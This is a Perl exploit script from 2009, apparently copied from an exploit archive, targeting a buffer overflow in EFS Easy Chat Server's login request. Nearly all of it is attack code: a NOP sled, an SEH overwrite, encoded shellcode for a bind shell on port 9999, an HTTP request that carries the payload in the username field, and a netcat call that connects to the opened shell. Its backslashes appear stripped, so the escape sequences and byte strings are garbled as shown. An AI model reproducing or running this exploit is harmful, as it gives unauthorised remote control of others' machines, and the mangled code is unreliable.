EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)
# Published : 2009-03-04
# Author : Dr4sH
# Previous Title : MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)
# Next Title : Easy File Sharing Web Server 4.8 File Disclosure Vulnerability

#!/usr/bin/perl
#
# EFS Easy Chat Server Authentication Request Buffer Overflow (SEH)
#
# Reference: http://www.milw0rm.com/exploits/8142
#
# Tested in Windows XP Pro SP2-3
#
# Coded by Dr4sH (Bruno F.)
#
# Contact: dr4sh[at]hotmail[dot]com
#
# Thankz: His0ka, str0ke, Vinicius N.
#
#[......................................................]
#
# bt~# perl easychat_server_bof.pl 192.168.1.64
#
# EFS Easy Chat Server Remote BoF Exploit (SEH)
#
# [*] Sending Diabolic request...
# [*] Connecting to bindshell 192.168.1.64:9999
#
# Microsoft Windows XP [vers?￡o 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesEasy Chat Server>
#
#[......................................................]
#
# Enjoy!
#

use IO::Socket;

print "nEFS Easy Chat Server Remote BoF Exploit (SEH)nn";

$host = shift || die "Usage: perl $0 <host>n";

$junk = "x90" x 208;
$jmp  = "xEBx06xAExFA";
$ppr  = "xB6xB2x01x10";

$shellcode = "xd9xe8xd9x74x24xf4xbbxb6x14x60xe5x5dx33xc9xb1".
			 "x50x31x5dx19x03x5dx19x83xedxfcx54xe1x9cx8fx73".
			 "x47xb5xa9x7cxa7xbax2ax09x34x61x8fx86x80x55x44".
			 "xe4x0fxdex5bxfbx9bx51x44x88xc3x4dx75x65xb2x06".
			 "x41xf2x44xf7x9bxc4xdexabx58x04x94xb4xa1x4ex58".
			 "xbaxe3xa5x97x87xb7x1dx70x8dxd2xd6xdfx49x1cx03".
			 "xb9x1ax12x98xcdx42x37x1fx39x7fx6bx94x34xecx57".
			 "xb6x27x2exa6x1dxc3x3bx8ax91x87x7cx01x5axe7x60".
			 "xb4xd7x48x91x98x8fxc6xefx2axa3x87x10xe4x5dx7b".
			 "x89x61x92x49x3dx05xa7x9fxe2xbdxb8x30x74xf5xab".
			 "x4dxbex59xccx78x9exd0xd7xe3xa0x0ex1fxeexf7xba".
			 "x1dx11x27x52xf8xe4x3dx0exadx09x6bx02x02xa5xc7".
			 "xf6xe7x1axabxabx18x4cx4dx24xc1x62xf4xe7x84x9c".
			 "x6dx6fx32x44xfexb7x6dx86x28x5dx81x29x80x5dx71".
			 "xa1x8ex0fx5fxdbx98xb0x49x48x72xb0xa5x07x99x07".
			 "xc3x91x36x67x1dx71xedxc3xf4x8dxddx7fx9ex96xa7".
			 "xb9x27x0exa7x90x82x4fx87x7bx46xd4x4execxf5x79".
			 "x06x09x93xd1x41xfbxafx5bx96x91x6bxd5xbbx57xb3".
			 "x16x91x66x71xf4x18xd4x59x95x68xa3x99x32xd9xff".
			 "xb1x36xe0xb3x57x48x69xf0xa8x60xc9xafx04xdcxbf".
			 "x1exc2xdfx6exf0x47xb1x6fx22x0fx9cx49xc6x01x8d".
			 "x96x1fxf7xcdx96x97xf8xe2xe2x8fxfax80x31x4bxfd".
			 "x51xebx6bxd1x36xfcx1exd5x99xafxe1x03xdax80x14";

$buffer = $junk.$jmp.$ppr.$shellcode;

$socket = IO::Socket::INET->new(PeerAddr=> $host,
                                PeerPort=> '80',
                                Proto=> 'tcp',
                                Timeout=>'1') || die "[-] Unable to Connect.!n";

print "[*] Sending Diabolic request...n";

print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1rn";
print $socket "Host: $hostrnrnrn";

close($socket);

print "[*] Connecting to bindshell $host:9999nn";

system("nc $host 9999");

# www.Syue.com [2009-03-04]